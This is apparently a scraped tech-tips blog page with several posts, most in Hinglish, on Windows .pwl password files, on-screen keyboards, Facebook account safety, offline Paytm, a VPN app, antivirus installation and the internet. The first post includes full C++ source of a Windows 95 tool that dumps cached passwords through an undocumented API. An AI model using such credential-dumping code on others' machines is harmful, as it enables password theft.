What Is Windows Password Files Torn Apart 2017 By Techthetips.

By // No comments:
Windows Password Files Torn Apart 2017


All, Windows, users would probably be familiar with the infamous ‘pwl’ files or the files where the Windows login passwords are stored. Well, this manual is aimed at, simplifying how the authentication works when you type in your User name And password, what exactly .pwl files contain, where exactly they come into the picture and a whole lot of related things.

The *.pwl files are basically files in which the Windows Login Passwords are stored in. These files can be found in the \Windows directory by the name of the User, whose password it contains. For Example, if your Windows login Username is safik, then the corresponding password would be stored in c:\windows\ankit.pwl Get it? These .pwl files are readable in any text editor like Notepad, but they are definitely not understandable.  A typical example, of the contents of a  .pwl file is as follows:

                                                                     

p u.ÐX+|rÐq"±/2³ Êå¡hCJ‚D  ×  `ÍY¥!íx}(qW¤ãƱ<!?àÜ6šá˜ôæ4+\3/4õ+%E°ËÔýmÇÔ ÞI»‚ B àלøÐ...'@



This is definitely not something  a normal person can comprehend or make sense of.

Now besides the Windows registry, Microsoft’s policy of security by obscurity can also be seen in the case of what .pwl files. Although the original usage of .pwl files was a standard to be used, by all applications, Microsoft simply does not officially provide any type of information on the standards of .pwl files.



To get a list of .pwl files in your system or in other words to find out which all passwords using the .pwl technology (What a good friend of mine likes to call them) are being stored on a particular system, then simply open
                       c:\windows\system.ini
in a plaintext editor like Notepad and look under the [Password Lists] section. A typical line from this section would be in the following format: USERNAME=Path_of_pwl_file


Example:-

[Password Lists]

safik=c:\windows\safik.pwl

This tells us that the .pwl containing the password for the Username ‘safik’ is stored at: c:\windows\safik.pwl

Anyway the algorithm which is used in the case of storing information in the .pwl files (rather in the .pwl security option), refers to such files as databases, with each record consisting of three fields-:

Resource name

Resource password

Resource type (0..255)

Before, I move onto giving details about the above three fields, let us discuss, how exactly the User Authentication process takes place in Windows (In the case of the login password.)

NOTE: The below process is what happens in the case of the Windows login password.

When you first set a new account on Windows, it derives an encryption key from the specified password and creates c:\windows\username.pwl file, where username is the, well, quite obvious. One, thing to note here is that the .pwl file does not, I repeat does not store the login password, nor does it store the Username.(Although its name is same as the Username for whose authentication it is used.) What it stores, will become clearer once you read the below paragraph.

Now the next time you boot your system and type in your Username and password, then Windows decrypts the .pwl corresponding to the Username provided, using the decrypting key obtained from the password provided. Once, the .pwl file has been decrypted using the decryption key obtained from the provided password Windows, verifies the checksum. If the checksum is correct or matches, then the user is authenticated else, try again. In the process of checksum verification, the username provided plays an important role.

Both the Username and Checksum are encrypted using a simple algorithm: RC4.


HACKING TRUTH:-


Although, almost always the name of the .pwl file is same as the Username, sometimes the name does differ.
For Example-if I use 2 to 3 different applications using .pwl security and then use the same username i.e. safik in all of them to store passwords, then the naming of the .pwl files would be as follows:

The first .pwl would be named: safik.pwl, the second would be named: safik000.pwl , the third would be: safik001.pwl and so on. And, I am not too sure, but from what I gather, Windows never ever overwrites a .pwl file.

Coming, back to the fields. Both the resource name and resource password fields can be binary or simply encrypted and they are interchangeable by the application involved. The Resource Type field can have different numerical values depending upon the software involved. For Example, DUN, Dial Up Server and Windows Login, uses 6 as the value for the Resource Type field. While, Internet Explorer uses 19 as the value of the same field.

One thing to note about Windows Login password algorithms is that, the first time it was introduced, the algorithm was very very weak and allowed passwords to be easily decrypted. However, with each new release, the algorithms used have been improving. However, it still has not reached a reliable level.

In the algorithms used by various Operating Systems to encrypt their login passwords, the algorithm used by Windows is the worst.  Some common defects are.

The cipher algorithms involved are relatively lame. i.e. RC4 and MD5. They can easily be broken.

All passwords are converted to uppercase
Un-acceptably lame or weak method of storage.
Various Holes existing in the Password Caching Facility. The following Visual C++ program demonstrates further as to how this vulnerability can be exploited.


/*
(c) 1997, 98 Vitas Ramanchauskas

Use Visual C++ to compile this into win32 console app.
This code provided for educational purpose only.
!! NO WARRANTY, NO SUPPORT !!
*/
#include <windows.h>
#include <stdio.h>

typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry; // size of this entry, in bytes
WORD cbResource; // size of resource name, in bytes
WORD cbPassword; // size of password, in bytes
BYTE iEntry; // entry index
BYTE nType; // type of entry
BYTE abResource[1]; // start of resource name
// password immediately follows resource name
} PASSWORD_CACHE_ENTRY;

char *buf, *ob1;
int cnt = 0;

BOOL CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)
{
cnt++;
memmove(buf, x->abResource, x->cbResource);
buf[x->cbResource] = 0;
CharToOem(buf, ob1);    // for non-English users
printf("%-30s : ", ob1);

memmove(buf, x->abResource+x->cbResource, x->cbPassword);
buf[x->cbPassword] = 0;
CharToOem(buf, ob1);
printf("%s\n", ob1);

return TRUE;
}

void main()
{
buf = new char[1024];
ob1 = new char[1024];
puts("There is no security in this crazy world!\n"
"Win95 PWL viewer v1.01 (c) 1997, 98 Vitas Ramanchauskas\n"
"************\n"
"!DISCLAIMER!\n"
"!This program intended to be used for legal purpose only!\n"
"************\n\n"
"This program shows cached passwords using standard (but undocumented)\n"
"Windows API on local machine for current user (user must be logged in).\n"
"You may invoke pwlview in this way: pwlview >> textfile.txt\n"
"to save passwords in file (don't forget to press enter twice)\n"
"Press Enter to begin...\n");
getchar();

HINSTANCE hi = LoadLibrary("mpr.dll");
if(!hi)
{
puts("Couldn't load mpr.dll. This program is for Windows 95 only");
return;
}
WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) =
(WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords");
if(!enp)
{
puts("Couldn't import function. This program is for Windows 95 only");
return;
}
(*enp)(0,0, 0xff, pce, 0);
if(!cnt)
puts("No passwords found.\n"
"Probably password caching was not used or user is not logged in.");
FreeLibrary(hi);
puts("\nPress Enter to quit");
getchar();

Ager Ho Gaya Hai Aapka Keyboard Kharab To Aise karen Typing.

By // No comments:


On screen Keyboard

Hi Friends kya aapke computer ka keyboard kharab ho gaya hai. aur aapko kuch important work bhi karne hai. jo bina keyboard ke possible nahi hai, un kamo ko karne ke liye aaj main aapko typing karne ke nayi tricks batane ja raha hoon. is article ke trough aap computer ka keyboard kharab hone ke babajood aap aasani se typing kar sakte hai.

Aapko ye jankari to hogi hai ki aapke computer me pre On Screen keyboard pahle se hi load hota hai. is onscreen keyboard ka use hum mouse se kar sakte hai. ager aap kisi post ya article ko type karna chahte ho to kisi extention ki help se write kar sakte hai. jo aapke voice ko text me assani se change kar dega.

Computer me Kahan Hota Hai On Screen Keyboard Ise Kaise karen Search.

On Screen Keyboard (osk)


pc me on screen keyboard ko search karne ke liye aapko sabse pahle aap start menu par click karenge iske bad program ke submenu ko open keejiye wahan par aapko virtual keyboard name ka ek option dikahyi de raha hoga. jaise hi aap is option par click karenge to aapke samne on screen keyboard open hokar aa jayega.

Ise hum doosre tareeke se pc me find kar sakte hai, iske liye aap start menu par click keejiye iske bad run box command me on screen keyboard likhkar enter ka button press kar deejiye. on screen keyboard aapke samne open ho jayega.

Kya aapke Mouse ka Click bhi kharab hai fir bhi karega ye apna kam.
Pc ko use karte karte kabhi kisi problem se mouse click karna bana kar jata hai aur work karte time aisi situation ho jaye to ye bahut badi problem create ho jati hai tab hume kuch samajh me nahi aata ki ab kya karen.

Isi problem ko lekar humari current work progress me rukabat aa jati hai aur hum typing bhi nahi kar pate hai, dosto main aapki is problem ka bhi solution lekar aaya hoon. Is problem ka solution on screen keyboard me diya gaya hai ager aap check karna chahte hai to aap jis word ko type karna chahte hai aap us word par mouse cursor ko us jagah par le jao. main aap logo ko example ke liye ek aur cheez batata hoon.

jaise ki aapko A word type karna hai to aap mouse cursor ko A button par le jakar kuch time ke liye chod deejiye wo word automatically type ho jayega. Aisa karne ke liye aapko on screen keyboard ki setting ko change karna padega.

Kaise karen On Screen Keyboard ke Setting ko Change.?


On screen Keyboard ke setting ko change karne ke liye aap sabse pahle on screen keyboard ke right side neeche diye gaye opption par keejiye.
jaise hi aap us option par click karenge to aapke samne ek nayi window screen open ho jayegi aap isme dekhiye aapko hovour over keys ka option dikhayi de raha hoga aap us par click keejiye.
Aur haan isme aap apne hisab se timeing ko bhi sate kar sakte ho ki kitni der axhar par cursor rakhne ke bad wo axhar automatically type ho jaye....Thank you.

Kaise bachaye Apne Facebook Account Ko Hack Hone se By Techthetips.

By // No comments:

Hi Friends aap sabhi logo ko mere taraf naye saal ki bahut bahut dili mubarakbad.

 

Facebook Hacking

Dosto main aap logo ko naye saal ke subh absar par facebook account ko hack hone se bachne ke liye ek bahut hi acchi tricks batane ja raha hoon. jisse ki aap ise follow karke apne Facebook Account ko hack hone se bacha sakte ho. dekha jaye to facebook ne apne taraf se users ke liye  bahut hi acchi sequerty ki byabastha ki hai. fir bhi users ki galtiyo se facebook ko use karne ke karan in users ke account hackers ke dwara bahut hi assani se hack ho jate hai. inhi choti choti galtiyo se kaise rahe bachkar aaiye jante hai.

Aise rakhe apne Facebook Account ko Safe.

sabse khas baat to aap log yah jan le  ki apne kisi account ka password simple yani ke sadharan na rakhe, aisa karne se hackers ko bahut hi assani se aapke account ko hack kar sakte hai. aap log ye to jante hi honge ki jab bhi hume koi bada nuksan hota hai us nuksan me apne kisi khas ka hath hota hai. kyoki usi khas aadmi ko humare secreat bahut acche se pata hota hai.

Bychance life me koi twist aisa aata hai jisse ki wohi khas humse alag ho jata hai aur humare secret ko galat tareeke se use karta hai. bs isi problem ko yad rakh ke hume aisa password creat karna chaiye jiska kisi ko jiker tak na ho. yad rahe yhi humari sabse pakad hoti hai kisi bhi account ya koi cheez se bachne ke liye.

jaise ki main aapko kuch example deta hoon suppose that aapne apna password apna name ya apni gf ka name apna nick name ya aise hi koi simple se name ka password creat kar liya to bas samaj leejiye ki isko crack karne me hackers ko jyada time nahi lagta aur wo aise password ko assani se crack kar deta hai. aur aapke account ko easily tareeke se hack kar leta hai.

Kya Karen Kya Na Karen.?


facebook hacking
 
Aise Banaye Apne Account Ka Password.


1- yad rahe aap apne password ko kam se kam Eight words (8) me creat karen. ager aap  Eight words  me password ko creat karte hai to aapka password Random Generator name ke trough hackers ise Hack nahi kar sakta.

2- Password creat karte time special characters ka bhi use karle to bahut hi achha rahega.

3- Ager aap chahte hai ki aapka password bahut hi acche se secure ho to aap apne password me numbers ka use kar le jaise ki 1 2 3 4 5 6 kuch bhi.

Apne Account ko Log out Karna Na bhoole.?

Ager aap apne Internet account ko kisi cafe ya college me use karte hai to is bat ka bhi aapko khyal rahe ki use karne ke bad usko log out jaroor kar den. aur han ager aap ye bhi kar den to jyada accha rahega aapne jo kuch bhi use kiya hai uski history ko aap delete kar den.

Ager aap google Chrome ko apne computer par use kar rhe hai to incognito Mode Start karke aap ager use karenge to ager aap is mode par work karenge to jaise hi aap browers ko close karenge to aap browser history automaically clear ho  jayegi. aur aapki koi bhi jankari local storag me nahi bacegi.
Facebook Security se Relative New Feature inka bhi kare use.

Dosto main aap logo ko bata doon ki facebook time-2 par apne users ke security ke liye kai parkar ke app bhi launch karta rahta hai. jisse ki facebook users ke account secure bana rahe.
jaise ki ager aapne ye feature ko apne device me activate kar liya to aapke account se agre koi bina bataye kuch bhi karta hai. to automaically aapko email par turant message aa jayega, us message ke trough aap apne account ko safe kar sakte hai.

Ager aap smartphone ka use kar rahe hai to jahir si bat hai ki aapka email sync ka option enable hona chaiye. ager enable hoga to aapko email message bhi bina Deley mil jayega. aur aap time se apne password ko bhi change kar sakte hai.

Jaroor Karen Apne Device Me HTTP Ko Check.


facebook hacking http

Aap apne account ko jab bhi log in karen to usse pahle ye jaroor check karle ki aapke address bar me facebook.com hi likha hua hai, usse pahle ye bhi dekh le ki green colour ka lock mark dikayi de raha hai.
Ager aapko aisa kuch nhi dikhai de raha hai to aap apne account ko just logout kar deejiye. aur apne browers ko update karle.... Thank u.

Note-Aane Bale E-mail se kabhi na karen apne Account ko log In.















 

Kaise karen Bina Internet Conection ke Paytm Ko Use.

By // No comments:
Paytm karo



Hi Friends Aaj tak aap logo ne keval paytm ka use internet connection ke sath hi kiya hoga, to aaj main aap logo ko ek aisi tricks batane ja raha hoon, ki aap us trick se bina internet connection ke bhi paytm ko use kar sakte ho. kaise karnege use ye janne ke liye aap is article ko read kariye aur ise follow keejiye.
Friends aap log Paytm ke bare me to jante hi honge, aur hamare jo bhi dost ya viewer paytm ke bare me nahi bhi jante the wo bhi ab jan gaye hai ki kya hai paytm aur kya hai iska use. jab se india goverment ne 1000 aur 500 ki curruncy ban ki hai tb se paytm ka craze jayada bad gaya hai, paytm ko use karke logo ki bahut problems solve hui hai.

Kya hai Paytm Jane:-


paytm karo


Paytm ek prakar ka Wallet App hai, is app ke trough hum aasani se money ko kahin bhi transfer kar sakte hai sabhi parkar ke Recharge kar sakte hai online Transaction bhi kar sakte hai aur bhi kai uses hai. but in sabko use karne ke liye abhi tak aap logo ko internet connection ki jarurat padti hogi, ab aapko internet connection ki koi bhi jaroorat nahi padegi ab aap in services ko bina internet ke bhi use kar sakte ho.
aisa karne ke liye company ne ek Toll-Free Number launch kiya hai, bas to fir aapne jis number se paytm account banaya hai usi number se toll free number par call kar deejiye jisse ki aapka Pin Set Ho jayega.

paytm karo


                                                        Toll-Free Number- 1800 1800 1234


Jaise hi aap call karenge to call cut hone ke bad aapke pass ek Voice Message Recieve hoga. is voice message me aapko call Back ke bare me jankari milegi. usi time aap apna Pin Set kar leejiye.
Pin Set hone ke bad aap Bina Internet Connection ke Paytm wallet ko aasani se use kar sakte ho. Aur kabhi bhi kahin bhi online Transaction bhi kar sakte ho....Thank you.


Aise Karen Internet Use Ki Koi Pta Bhi Na Chala Paye.

By // No comments:


F Secure Freedom App

Hello Friends Ager Aap log internet ko use karna chahte hai, aur ye bhi chahte hai ki hum internet word me hide bhi rahe to aisa karne ke liye karen. Bs Friends isi tips ko main aap logo ko batane ja raha hoon. ki kaise gumnam rahakar internet ki dunia me mast rahe. aisa karne ke liye aapko ek app ki jaroorat bhi padegi. us app ka name hai F Secure company Ka Freedom app hai. jo F Secure Cloud ke Trough internet ko connect rakhne me aapki help karta hai. Aur dosto sabse badi bat to ye hai ki ye aapke system ka IP Address Ko Hide karke rakhega. Aap apne system ke IP Address Ko Option Me Choose karke Hide bhi kar sakte hai. Isme aap apni Virtual Location bhi change kar sakte hai ager aapki virtual location india hai to aap virtual location ko change karke usko kisi bhi country name me change kar sakte hai. Example US, Germany, UK, Finland And any others.
Aisa Karne se aap log un services ka bhi use kar sakte hai, kuch aisi services hoti hai jo aapke home country me avilable hoti hai aap unko to kar sakte ho. but jo services home country se bahar hai yani ki unko aap use nahi kar sakte aap iske trough unko bhi use kar sakte ho.


Note- Dear viewer`s aap logo ko ye bat yad rahe ki koi bhi tips tricks ka galat use na karen ager aap galat use karte hai to aap uske Khud jimmedar honge.

Kaise Karega Ye App Kam Jane. 

f secure freddom App


Is app ke bahut bade bade kam hai, ye app aapke IP Address ko hide bhi kar sakta hai aur iske sath sath aapko Cyber ​​espionage (Cyber Jasoosi) Aur bhi kai other dangerous options se aapko bacha sakta hai. ye app aisa karne me bhut mahir app hai.
Aapko sayad ye pta na ho ki jab aap internet se connect hote hai tab aapka device us time ek Unique IP Adderss ka use karta hai.
Is aap ki ek aur khas bat ye hai ki ye app kisi bhi type ke users Traffic ya User Name Contact Detail ko Af Secure Log Nahi Karta hai. F Secure Cloud Company ka manna hai ki ye app Internet Connection surkha ke sath sath kahin bhi jane par use karne par Goverment user ya regular user iske trough hide rahkar surffing kar sakte hai. aur haan jab users wi-fi ko use karega tab uska Traffic  Code me rahega, aisa hone se users ki communication detail koi bhi nahi nikal sakta aur na hi ksi bhi tareeke se pata kar sakta hai. ye app aapko many typs ki problem se secure rakhta hai aur sath sath jankari bhi deta hai. main aapko kuch example bhi deta hoon.

Example:-
Virus Protection and Harmfull Sites And Tracker`s jaise problem se aapko secure rakhega aur aapko jankari bhi dega....Thank you.

Ab Karen Install Apne Computer Me Antivirus Wo Bhi Free Me.

By // No comments:


Free Antivirus For Pc


Hi Friends Aap logo ne Antivirus ka name to suna hi hoga, Aur aap uske kam ko bhi jante honge ki kya hota hai iska kam. ager nhi jante to main aap logo ko is article ke trough bahut hi simple tareeke se batane ja raha hoon. Computer Me Antivirus ka hona aapke liye bahut hi jaroori hai ager aapke computer me antivirus nhi hai to aapka computer kabhi bhi problem creat kar sakta hai. Dosto ager paiso ki killat se aap purchase karke koi antivirus apne computer me install nahi kar sakte, to internet ke trough download karke free me to install kar ho sakte ho.

Free Antivirus ko Pc Me Install karne ke Aasan Tareeke.





Free Antivirus For Pc

Free Antivirus ko apne computer me kaise install karte hai. ye main aapko step by step samjhane ki koshis karta hoon. aur main aasa bhi karta hoon ki ye aapko aasani se samajh me bhi aa jayega. to chaliye kaise karte hai computer me ise install jane.

Step:-1) Aap jis antivirus ko apne Pc me install karna chahte hai. use internet ke trough apne computer me
             Download kar leejiye.

Step:-2)  Antivirus ke download hone ke bad aap download history ko open keejiye.

Step:-3) Ab iske bad jo aapne Antivirus downlaod kiya hai us par double click karke use open keejiye.

Step:-4) Jaise hi aap double click karenge to aapke samne install karne ke liye Ek Run dilouge box open ho
              jayega. aap Run option par click kar deejiye.

Step:-5) Click Karne ke bad todi si process aapke samne chalegi iske bad aapke samne do option aa
              jayenge (1). Custom (2). Manual

Step:-6) In option ka matlab hota hai, ager aapne custom option ko choose kiya to aapko khud kuch option
             chunne padenge ager aapne Manual option ko choose kiya to aapka pc automaticlly choose kar
             lega.

Step:-7) Antivirus ke Install Hone ke bad aapko fisrt time activate karne ke liye internet ke trough update
             karna padega. Tabhi ye aapke computer me proper work karega.

Internet What Is Internet Know By Techthetips.

By // No comments:




Hi Friends aaj Internet ke madyam se Future ko nayi starting mili hai. ager internet na hota to abhi bhi humari aur aapki thinking bahut hi week hoti. ye sab kuch internet hi ka sath hai ki hume aapse jode rakhta hai. bina internet ke computer aur mobile jaise ki kuch hai hi nahi. lagta hai jaise internet ne hi unme jan dal di ho, kya aap bina internet ke whatsapp facebook ya gmail ko use kar sakte ho nahi kabhi nahi. ye sab internet ke hone se hi chalte hai, to chaliye main batata hoon ki kya hota hai internet.

Kya Hota Hai Internet Jane:-)

 
Internet aaj ki duniya ki aisi Technology jo do ya do se adhik computers ko Data Servers, Data Center ko ek time ek sath aapas me jode rahta hai. jaise ki aap facebook ka use karte hai aur us par uploading bhi karte hai. kya aap ye janna nahi chahenge ki jo data aap upload karte hai wo data kahan jata hai. to main batata hoon ki wo data kahan jata hai, ye upload kiya hua data America ke Silicon Belly cities Facebook ke headquarters ke data center me store ho jata hai. yahi to hai internet.

Internet Revolution Kya Hai:-)
 
Present Time par Internet ka use har jagah ho raha rha hai. aur ho bhi kyo na kyoki humari problem jo solve ho jati. dekha jaye to back years me internet se bahut se log aise jud gaye hai, mano ki ye bina iske kisi tecnology ke bare me kuch soch bhi nahi sakte hai. humare samaj se dekha jaye to sayad hi koi aisi jagah ho jahan internet ka use na kiya ja raha ho. internet ka ek simple sa example deta hoon. jisse india me E-Governence ka benifites kai Lacks Village and panchayayt ko mila hai. yahi hai internet Revolution.

Internet Use Karne ke Fayde:-)

Dosto Aaj hame kisi bhi jankari ki jaroorat hoti hai to hum us jankari ko google se find kar lete hai. ager aap kisi Exam ki taiyari kar rahe hai to Google ke through aap behtar taiyari kar sakte hai. Ager aap koi samagree banana chahte ho to Aap internet ke Madhyam se bana sakte ho. Ager aapko bahar kahin bhi ghoomne jana hai to Intenet ke google map se aap help le sakte ho, aur bhi bahut se benifites internet se hote hai.

Internet Se Hone Bale Nuksan:-)
 
Internet ka use ager bahut se log acche kam ke liye use karte hai, to bahut se log iska galat use bhi karte hai. kuch users to networking sites ke habbectual ho jate hai aur contineue isko use karte rahte hai. lagatar use karne se aapke swasth me problem aa jayegi, ager aap continue iska use karte hai to. ager aap unsepreated tareeke se isko chalate hai to aapke computer me virus problem aa jayegi.
Aur han sabse bada nuksan to ye ki internet ka use ager aap secure hokar nahi kar rahe hai to hackers aapki importants cheezo ko hack bhi kar sakte hai.
Bs yahi hai Internet Jiske hone se aapko fayde bhi hai aur nuksan bhi.. Thank you.